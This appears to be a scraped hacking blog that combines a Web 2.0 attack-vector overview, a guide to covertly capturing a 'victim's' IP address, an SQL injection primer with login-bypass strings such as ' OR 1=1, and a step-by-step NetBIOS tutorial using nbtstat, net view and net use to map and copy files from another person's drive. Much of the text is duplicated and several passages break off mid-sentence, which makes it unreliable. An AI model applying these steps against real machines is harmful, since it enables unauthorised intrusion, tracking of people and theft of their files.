Web 2.0 is the novel term coined for new generation Web applications. start.com, Google
maps, Writely and MySpace.com are a few examples. The shifting technological landscape is the driving force behind these Web 2.0 applications. On the one hand are Web services that are empowering server-side core technology components and on the other hand are AJAX and Rich Internet Application (RIA) clients that are enhancing client-end interfaces in the browser itself. XML is making a significant impact at both presentation and transport (HTTP/HTTPS) layers. To some extent XML is replacing HTML at the presentation layer while SOAP is becoming the XML-based transport mechanism of choice.
WEB 2.0 Security concerns – Reshaping the industry
This technological transformation is bringing in new security concerns and attack vectors into existence. Yamanner, Samy and Spaceflash type worms are exploiting “client-side” AJAX frameworks, providing new avenues of attack and compromising some of the confidential information. On the “server-side”, XML based Web services are replacing some of the key functionalities and providing distributed application access through Web services interfaces. These remote capabilities to invoke methods over GET, POST or SOAP from the Web browser itself provide new openings to applications. On other side, RIA frameworks running on XML, XUL, Flash, Applets and JavaScripts are adding new possible sets of vectors. RIA, AJAX and Web services are adding new dimensions to Web application security.
Here is the list of 10 attack vectors along with a brief overview of each:
1. Cross-site scripting in AJAX
In last few months, several cross-site scripting attacks have been observed, where malicious JavaScript code from a particular Web site gets executed on the victim’s browser thereby compromising information. A recent example is the Yamanner worm that exploited cross-site scripting opportunities in Yahoo mail’s AJAX call. Another recent example is the Samy worm that exploited MySpace.com’s cross-site scripting flaw. AJAX gets executed on the client-side by allowing an incorrectly written script to be exploited by an attacker. The attacker is only required to craft a malicious link to coax unsuspecting users to visit a certain page from their Web browsers. This vulnerability existed in traditional applications as well but AJAX has added a new dimension to it.
2. XML poisoning
XML traffic goes back and forth between server and browser in many of the WEB 2.0 applications. Web applications consume XML blocks coming from AJAX clients. It is possible to poison this XML block. Not uncommon is the technique to apply recursive payloads to similar-producing XML nodes multiple times. If the engine’s handling is poor this may result in a denial of services on the server. Many attackers also produce malformed XML documents that can disrupt logic depending on parsing mechanisms in use on the server. There are two types of parsing mechanisms available on the server side – SAX and DOM. This same attack vector is also used with Web services since they consume SOAP messages and SOAP messages are nothing but XML messages. Largescale adaptation of XMLs at the application layer opens up new opportunities to use this new attack vector. XML external entity reference is an XML property which can be manipulated by an attacker. This can lead to arbitrary file or TCP connection openings that can be leveraged by an attacker. XML schema poisoning is another XML poisoning attack vector which can change execution flow. This vulnerability can help an attacker to compromise confidential information.
3. Malicious AJAX code execution
AJAX calls are very silent and end-users would not be able to determine whether or not the browser is making silent calls using the XMLHTTPRequest object. When the browser makes an AJAX call to any Web site it replays cookies for each request. This can lead to potential opportunities for compromise. For example, John has logged in to his bank and authenticated on the server. After completing the authentication process he gets a session cookie. His bank’s page has a lot of critical information. Now he browses other pages while still logged in to his bank’s account Web page and lands at an attacker’s Web page. On this page the attacker has written silent AJAX code which makes backend calls to his bank without John’s consent, fetches critical information from the pages and sends this information to the attacker’s Web site. This leads to a security breach and leakage of confidential information.
4. RSS / Atom injection
This is a new WEB 2.0 attack. RSS feeds are common means of sharing information on portals and Web applications. These feeds are consumed by Web applications and sent to the browser on the client-side. One can inject literal JavaScripts into the RSS feeds to generate attacks on the client browser. An end user visits this particular Web site loads the page with the RSS feed and the malicious script – a script that can install software or steal cookies – gets executed. This is a lethal client-side attack. Worse, it can be mutated. With RSS and ATOM feeds becoming integral part of Web applications, it is important to filter out certain characters on the server-side before pushing the data out to the end user.
5. WSDL scanning and enumeration
WSDL (Web Services Definition Language) is an interface to Web services. This file provides key information about technologies, exposed methods, invocation patterns, etc. This is very sensitive information and can help in defining exploitation methods. Unnecessary functions or methods kept open can cause potential disaster for Web services. It is important to protect WSDL file or provide limited access to it. In real case scenarios, it is possible to discover several vulnerabilities using WSDL scanning.
6. Client side validation in AJAX routines
WEB 2.0 based applications use AJAX routines to do a lot of work on the client-side,such as client-side validations for data type, content-checking, date fields, etc. Normally, these client-side checks must be backed up by server-side checks as well. Most developers fail to do so; their reasoning being the assumption that validation is taken care of in AJAX routines. It is possible to bypass AJAX-based validations and to make POST or GET requests directly to the application – a major source for input validation based attacks such as SQL injection, LDAP injection, etc. that can compromise a Web application’s key resources. This expands the list of potential attack vectors that attackers can add to their existing arsenal. AJAX routines are
7. Web services routing issues
Web services security protocols have WS-Routing services. WS-Routing allows SOAP messages to travel in specific sequence from various different nodes on the Internet.Often encrypted messages traverse these nodes. A compromise of any of the intermediate nodes results in possible access to the SOAP messages traveling between two end points.This can be a serious security breach for SOAP messages. As Web applications move to adopt the Web services framework, focus shifts to these new protocols and new attack vectors are generated.
8. Parameter manipulation with SOAP
Web services consume information and variables from SOAP messages. It is possible to
manipulate these variables. For example, “<id>10</id>” is one of the nodes in SOAP Messages. An attacker can start manipulating this node and try different injections – SQL,
LDAP, XPATH, command shell – and explore possible attack vectors to get a hold of internal machines. Incorrect or insufficient input validation in Web services code leaves the Web services application open to compromise. This is a new available attack vector to target Web applications running with Web services.
9. XPATH injection in SOAP message
XPATH is a language for querying XML documents and is similar to SQL statements where we can supply certain information (parameters) and fetch rows from the database. XPATH parsing capabilities are supported by many languages. Web applications consume large XML documents and many times these applications take inputs from the end user and form XPATH statements. These sections of code are vulnerable to XPATH injection. If XPATH injection gets executed successfully, an attacker can bypass authentication mechanisms or cause the loss of confidential information. There are few known flaws in XPATH that can be leverage by an attacker. The only way to block this attack vector is by providing proper input validation before passing values to an XPATH statement.
10. RIA thick client binary manipulation
Rich Internet Applications (RIA) use very rich UI features such as Flash, ActiveX Controls or Applets as their primary interfaces to Web applications. There are a few security issues with this framework. One of the major issues is with session management since it is running in browser and sharing same session. At the same time since the entire binary component is downloaded to the client location, an attacker can reverse engineer the binary file and decompile the code. It is possible to patch these binaries and bypass some of the authentication logic contained in the code. This is another interesting attack vector for WEB 2.0 frameworks.
Conclusion
AJAX, RIA and Web services are three important technological vectors for the WEB 2.0
application space. These technologies are promising and bring new equations to the table,
empowering overall effectiveness and efficiency of Web applications. With these new
technologies come new security issues, and ignoring them can lead to big disasters for the
corporate world. In this article, the discussion was restricted to only ten attacks but there
are several other attack vectors as well. Increased WEB 2.0 security awareness, secure
coding practices and secure deployments offer the best defense against these new attack
vectors.
maps, Writely and MySpace.com are a few examples. The shifting technological landscape is the driving force behind these Web 2.0 applications. On the one hand are Web services that are empowering server-side core technology components and on the other hand are AJAX and Rich Internet Application (RIA) clients that are enhancing client-end interfaces in the browser itself. XML is making a significant impact at both presentation and transport (HTTP/HTTPS) layers. To some extent XML is replacing HTML at the presentation layer while SOAP is becoming the XML-based transport mechanism of choice.
WEB 2.0 Security concerns – Reshaping the industry
This technological transformation is bringing in new security concerns and attack vectors into existence. Yamanner, Samy and Spaceflash type worms are exploiting “client-side” AJAX frameworks, providing new avenues of attack and compromising some of the confidential information. On the “server-side”, XML based Web services are replacing some of the key functionalities and providing distributed application access through Web services interfaces. These remote capabilities to invoke methods over GET, POST or SOAP from the Web browser itself provide new openings to applications. On other side, RIA frameworks running on XML, XUL, Flash, Applets and JavaScripts are adding new possible sets of vectors. RIA, AJAX and Web services are adding new dimensions to Web application security.
Here is the list of 10 attack vectors along with a brief overview of each:
1. Cross-site scripting in AJAX
In last few months, several cross-site scripting attacks have been observed, where malicious JavaScript code from a particular Web site gets executed on the victim’s browser thereby compromising information. A recent example is the Yamanner worm that exploited cross-site scripting opportunities in Yahoo mail’s AJAX call. Another recent example is the Samy worm that exploited MySpace.com’s cross-site scripting flaw. AJAX gets executed on the client-side by allowing an incorrectly written script to be exploited by an attacker. The attacker is only required to craft a malicious link to coax unsuspecting users to visit a certain page from their Web browsers. This vulnerability existed in traditional applications as well but AJAX has added a new dimension to it.
2. XML poisoning
XML traffic goes back and forth between server and browser in many of the WEB 2.0 applications. Web applications consume XML blocks coming from AJAX clients. It is possible to poison this XML block. Not uncommon is the technique to apply recursive payloads to similar-producing XML nodes multiple times. If the engine’s handling is poor this may result in a denial of services on the server. Many attackers also produce malformed XML documents that can disrupt logic depending on parsing mechanisms in use on the server. There are two types of parsing mechanisms available on the server side – SAX and DOM. This same attack vector is also used with Web services since they consume SOAP messages and SOAP messages are nothing but XML messages. Largescale adaptation of XMLs at the application layer opens up new opportunities to use this new attack vector. XML external entity reference is an XML property which can be manipulated by an attacker. This can lead to arbitrary file or TCP connection openings that can be leveraged by an attacker. XML schema poisoning is another XML poisoning attack vector which can change execution flow. This vulnerability can help an attacker to compromise confidential information.
3. Malicious AJAX code execution
AJAX calls are very silent and end-users would not be able to determine whether or not the browser is making silent calls using the XMLHTTPRequest object. When the browser makes an AJAX call to any Web site it replays cookies for each request. This can lead to potential opportunities for compromise. For example, John has logged in to his bank and authenticated on the server. After completing the authentication process he gets a session cookie. His bank’s page has a lot of critical information. Now he browses other pages while still logged in to his bank’s account Web page and lands at an attacker’s Web page. On this page the attacker has written silent AJAX code which makes backend calls to his bank without John’s consent, fetches critical information from the pages and sends this information to the attacker’s Web site. This leads to a security breach and leakage of confidential information.
4. RSS / Atom injection
This is a new WEB 2.0 attack. RSS feeds are common means of sharing information on portals and Web applications. These feeds are consumed by Web applications and sent to the browser on the client-side. One can inject literal JavaScripts into the RSS feeds to generate attacks on the client browser. An end user visits this particular Web site loads the page with the RSS feed and the malicious script – a script that can install software or steal cookies – gets executed. This is a lethal client-side attack. Worse, it can be mutated. With RSS and ATOM feeds becoming integral part of Web applications, it is important to filter out certain characters on the server-side before pushing the data out to the end user.
5. WSDL scanning and enumeration
WSDL (Web Services Definition Language) is an interface to Web services. This file provides key information about technologies, exposed methods, invocation patterns, etc. This is very sensitive information and can help in defining exploitation methods. Unnecessary functions or methods kept open can cause potential disaster for Web services. It is important to protect WSDL file or provide limited access to it. In real case scenarios, it is possible to discover several vulnerabilities using WSDL scanning.
6. Client side validation in AJAX routines
WEB 2.0 based applications use AJAX routines to do a lot of work on the client-side,such as client-side validations for data type, content-checking, date fields, etc. Normally, these client-side checks must be backed up by server-side checks as well. Most developers fail to do so; their reasoning being the assumption that validation is taken care of in AJAX routines. It is possible to bypass AJAX-based validations and to make POST or GET requests directly to the application – a major source for input validation based attacks such as SQL injection, LDAP injection, etc. that can compromise a Web application’s key resources. This expands the list of potential attack vectors that attackers can add to their existing arsenal. AJAX routines are
7. Web services routing issues
Web services security protocols have WS-Routing services. WS-Routing allows SOAP messages to travel in specific sequence from various different nodes on the Internet.Often encrypted messages traverse these nodes. A compromise of any of the intermediate nodes results in possible access to the SOAP messages traveling between two end points.This can be a serious security breach for SOAP messages. As Web applications move to adopt the Web services framework, focus shifts to these new protocols and new attack vectors are generated.
8. Parameter manipulation with SOAP
Web services consume information and variables from SOAP messages. It is possible to
manipulate these variables. For example, “<id>10</id>” is one of the nodes in SOAP Messages. An attacker can start manipulating this node and try different injections – SQL,
LDAP, XPATH, command shell – and explore possible attack vectors to get a hold of internal machines. Incorrect or insufficient input validation in Web services code leaves the Web services application open to compromise. This is a new available attack vector to target Web applications running with Web services.
9. XPATH injection in SOAP message
XPATH is a language for querying XML documents and is similar to SQL statements where we can supply certain information (parameters) and fetch rows from the database. XPATH parsing capabilities are supported by many languages. Web applications consume large XML documents and many times these applications take inputs from the end user and form XPATH statements. These sections of code are vulnerable to XPATH injection. If XPATH injection gets executed successfully, an attacker can bypass authentication mechanisms or cause the loss of confidential information. There are few known flaws in XPATH that can be leverage by an attacker. The only way to block this attack vector is by providing proper input validation before passing values to an XPATH statement.
10. RIA thick client binary manipulation
Rich Internet Applications (RIA) use very rich UI features such as Flash, ActiveX Controls or Applets as their primary interfaces to Web applications. There are a few security issues with this framework. One of the major issues is with session management since it is running in browser and sharing same session. At the same time since the entire binary component is downloaded to the client location, an attacker can reverse engineer the binary file and decompile the code. It is possible to patch these binaries and bypass some of the authentication logic contained in the code. This is another interesting attack vector for WEB 2.0 frameworks.
Conclusion
AJAX, RIA and Web services are three important technological vectors for the WEB 2.0
application space. These technologies are promising and bring new equations to the table,
empowering overall effectiveness and efficiency of Web applications. With these new
technologies come new security issues, and ignoring them can lead to big disasters for the
corporate world. In this article, the discussion was restricted to only ten attacks but there
are several other attack vectors as well. Increased WEB 2.0 security awareness, secure
coding practices and secure deployments offer the best defense against these new attack
vectors.
Friday, July 1, 2011
How to get IP address of another computer remotely
Hello friends, today i will explain you how to get IP address of any computer remotely. Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it.
There are several methods to get an IP address of the victim but i will share few and specially the best one's that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.
 |
| How to find or get Ip address of somebody else remotely |
4 ways to get the IP address of the Victim or another Computer:
1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and yahoo chat sessions
As we are here to learn concepts so i will first explain what is an IP address and what's its importance. So friends very basic question What is an IP address? Why its important for hackers and security professionals?
What is an IP address?
Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules( for Network its rules for communication).
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing
For exploring more about IP addressing read on wikipedia.
How to Find IP address of another computer?
1. Using PHP notification Script
Using this Notification script you can get the IP address in just seconds. Steps of using this PHP script:
a. Download the PHP notify script and extract files.
b. Now you will get two files IP.html and index.php . You need to upload these two files to any free web hosting server.
Example: i used www.my3gb.com to upload these two files. Create an account there and upload these two files there as shown below.
c. Now you will need to send the link of index.php to the victim whose password you want to get. to get the link click on index.php shown in above snapshot. Now a new window will open copy the link in the address bar and send to the victim whose IP address you want.
d. Now when the victim opens the above link nothing will open but his Ip address is written into the ip.html file. So open the ip.html file to get his IP address.
e. That's all this method... I hope you liked it.
2. Using Blogs and Websites
This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.
That's only.
3. Using Read Notify service
This is an email based service. Steps to use Read Notify service:
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated.
Do the following steps use this service:
- Compose your email just like you usually would in your own email or web email program
- Type: .readnotify.com on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: ABC@gmail.com.readnotify.
com - Send your email
- don't send to and from the same computer
- if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
- if you are cc-ing your email to other readers, you must add tracking to all of them
4. Sniffing Yahoo and Gmail Chat sessions
With the help of Sniffers like ethereal, wireshark etc we can sniff the Gmail, and yahoo chat sessions while we are chatiing to any our friend and extract the IP address from there.5. Bonus Method for Online Gamers
We can also get the IP address from online games like counter strike, age of empires in Game ranger etc.. Many counter strike servers use amx mode. Just view which people are connecting and whats their IP addess as plugins show the IP address of people connecting to the game server. If you have more access to counter strike server you can use status command in console. Just go to console and type "status"(without quotes) and press enter there you can see all players details his steam ID and much more depending upon server.Saturday, May 28, 2011
How They Hack Your Website: Overview of Common Techniques
We hear the same terms bandied about whenever a popular site gets hacked. You know… SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine — a nefarious, impossibly technical twilight world forever beyond our ken?
Not really.
When you consider that you can go to Google right now and enter a search string which will return you thousands of usernames and passwords to websites, you realize that this dark science is really no mystery at all. You'll react similarly when you see just how simple a concept SQL Injection is, and how it can be automated with simple tools. Read on, to learn the basics of how sites and web content management systems are most often hacked, and what you can do to reduce the risk of it happening to you.
SQL Injection
SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.
The Simple SQL Injection Hack
In its simplest form, this is how the SQLInjection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a Username field:
' OR 1=1
' OR 1=1
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = ?USRTEXT '
AND password = ?PASSTEXT?
AND password = ?PASSTEXT?
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ?' OR 1=1 — 'AND password = '?
Two things you need to know about this:
['] closes the [username] text field.
['] closes the [username] text field.
'' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:SELECT * FROM users WHERE username = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.
Let's hope you got the gist of that, and move briskly on.
Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.
But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:
- admin'—
- ') or ('a'='a
- ”) or (“a”=”a
- hi” or “a”=”a
… and so on.
Backdoor Injection- Modules, Forums, Search etc.
Hacking web forms is by no means limited exclusively to login screens. A humble search form, for instance, is necessarily tied to a database, and can potentially be used to amend database details. Using SQL commands in search forms can potentially do some extremely powerful things, like calling up usernames and passwords, searching the database field set and field names, and amending same. Do people really get hacked through their search forms? You better believe it. And through forums, and anywhere else a user can input text into a field which interacts with the database. If security is low enough, the hacker can probe the database to get names of fields, then use commands like INSERT INTO, UNION, and so forth to get user information, change product prices, change account settings/balances, and just about anything else… depending on the security measures in place, database architecture and so on.
Hacking web forms is by no means limited exclusively to login screens. A humble search form, for instance, is necessarily tied to a database, and can potentially be used to amend database details. Using SQL commands in search forms can potentially do some extremely powerful things, like calling up usernames and passwords, searching the database field set and field names, and amending same. Do people really get hacked through their search forms? You better believe it. And through forums, and anywhere else a user can input text into a field which interacts with the database. If security is low enough, the hacker can probe the database to get names of fields, then use commands like INSERT INTO, UNION, and so forth to get user information, change product prices, change account settings/balances, and just about anything else… depending on the security measures in place, database architecture and so on.
So you can have security locked down at the login, but poor security on other forms can still be exploited. Unfortunately this is a real worry regarding 3rd party modules for Web CMS products which incorporate forms, and for CMS products these 3rd party modules are often the weakest links which allows hackers access to your database.
Automated Injection
There are tools to automate the process of SQL Injection into login and other fields. One hacker process, using a specific tool, will be to seek out a number of weak targets using Google (searching for login.asp, for instance), then insert a range of possible injection strings (like those listed above, culled from innumerable Injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play XBox while the program automates the whole injection process.
There are tools to automate the process of SQL Injection into login and other fields. One hacker process, using a specific tool, will be to seek out a number of weak targets using Google (searching for login.asp, for instance), then insert a range of possible injection strings (like those listed above, culled from innumerable Injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play XBox while the program automates the whole injection process.
Remote Injection
This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It's a topic which was deemed beyond the scope of this report, but you can view thisPDF if you'd like to learn more.
This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It's a topic which was deemed beyond the scope of this report, but you can view thisPDF if you'd like to learn more.
SQL Injection in the Browser Address Bar
Injections can also be performed via the browser address bar. I don't mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests withURLs of the following form are most often held to be vulnerable:
Injections can also be performed via the browser address bar. I don't mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests withURLs of the following form are most often held to be vulnerable:
http://somesite.com/index.asp?id=10
Try adding an SQL command to the end of a URL string like this, just for kicks:
http://somesite.com/index.asp?id=10 AND id=11
http://somesite.com/index.asp?id=10 AND id=11
See if both articles come up. Don't shoot your webmaster just yet if it's your own site and you get two articles popping up: this is real low-level access to the database. But some such sites will be vulnerable. Try adding some other simple SQL commands to the end of URLs from your own site, to see what happens.
By
Thursday, May 26, 2011
Wednesday, May 25, 2011
Ethical Hacking” Case Studies
Download “Ethical Hacking” Case Studies from www.orsoc.org.uk
Click Here to Download the presentation
Download Major Hacking Case Studies from www.isaca.org.hk
Download Bluetooth Hacking Case Study from www.garykessler.net
Download Anti-Hacking Case Studies
Friday, May 6, 2011
NETBIOS HACKING
NETBIOS HACKING - BREAKING INTO SYSTEM
-What is it?-
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.
-How can this be of use to me?-
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.
-What do I need?-
Windows OS
Cain and Abel - get it from here - http://www.oxid.it/
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Step 1, Finding the target.]-++++++++++++++++++++++++++++++++++++++++++++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross
-What is it?-
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.
-How can this be of use to me?-
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.
-What do I need?-
Windows OS
Cain and Abel - get it from here
Another window will pop up, make sure "All host in my subnet" is selected, and then click ok.
It should begin to scan.
Then IP's, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can't tell whether the IP address is a computer, router, modem, etc, that's ok.
During the next step we will begin our trial and error.
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Now, we don't know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let's get back to the hacking.
Type in "ping (IP address of the target)." For example in this tutorial, "ping 192.168.1.103."
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):
IF it didn't work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Now, input this command "nbtstat –a (IP address of target)." An example would be "nbtstat –a 192.168.1.103."
This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.
Ok, you're probably wondering, "What does all this mean to me?" Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.
The information right below the original command says: "Local Area Connection," this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.
The information right below the "Local Area Connection," is "Wireless Network Connection 2:" It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.
The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn't. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Finally it's time.
By now we know: that our target is online, our target has file sharing, and our target's computer name.
So it's time to break in.
We will now locate the shared drives, folders, files, or printers. Type in "net view \\(IP Address of Target)"
An example for this tutorial would be: "net view \\192.168.1.103
We have our just found our share name. In this case, under the share name is "C," meaning that the only shared thing on the computer is C. Then to the right, under Type, it says "Disk." Thismeans that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person's hard drive.
All's that is left to do is "map" the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in "net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, "net use K: \\192.168.1.103\C." Ok, let's say that you plan on doing this again to a different person, do u see the "K after "net use?" This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be "net use G...," for a different target.
As you can see, for my hack I have already used "K," so I used "G" instead.
You may also do the same for multiple hacks.
If it worked, it will say "The command completed successfully."
If not, you will have to go retrace you steps.
Now open up "my computer" under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won't be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!
-What is it?-
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.
-How can this be of use to me?-
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.
-What do I need?-
Windows OS
Cain and Abel - get it from here - http://www.oxid.it/
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Step 1, Finding the target.]-++++++++++++++++++++++++++++++++++++++++++++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross
-What is it?-
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.
-How can this be of use to me?-
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.
-What do I need?-
Windows OS
Cain and Abel - get it from here
CODE
http://www.oxid.it/
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Step 1, Finding the target.]-++++++++++++++++++++++++++++++++++++++++++++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged
in to the LAN, or connected to the WAN, you can begin.
Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for
all IP addresses in the local subnet. Once you have opened up the program click on the
sniffer tab, click the Start/Stop sniffer, and then click the blue cross
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Step 1, Finding the target.]-++++++++++++++++++++++++++++++++++++++++++++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged
in to the LAN, or connected to the WAN, you can begin.
Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for
all IP addresses in the local subnet. Once you have opened up the program click on the
sniffer tab, click the Start/Stop sniffer, and then click the blue cross
Another window will pop up, make sure "All host in my subnet" is selected, and then click ok.
It should begin to scan.
Then IP's, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can't tell whether the IP address is a computer, router, modem, etc, that's ok.
During the next step we will begin our trial and error.
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Now, we don't know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let's get back to the hacking.
Type in "ping (IP address of the target)." For example in this tutorial, "ping 192.168.1.103."
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):
IF it didn't work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Now, input this command "nbtstat –a (IP address of target)." An example would be "nbtstat –a 192.168.1.103."
This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.
Ok, you're probably wondering, "What does all this mean to me?" Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.
The information right below the original command says: "Local Area Connection," this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.
The information right below the "Local Area Connection," is "Wireless Network Connection 2:" It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.
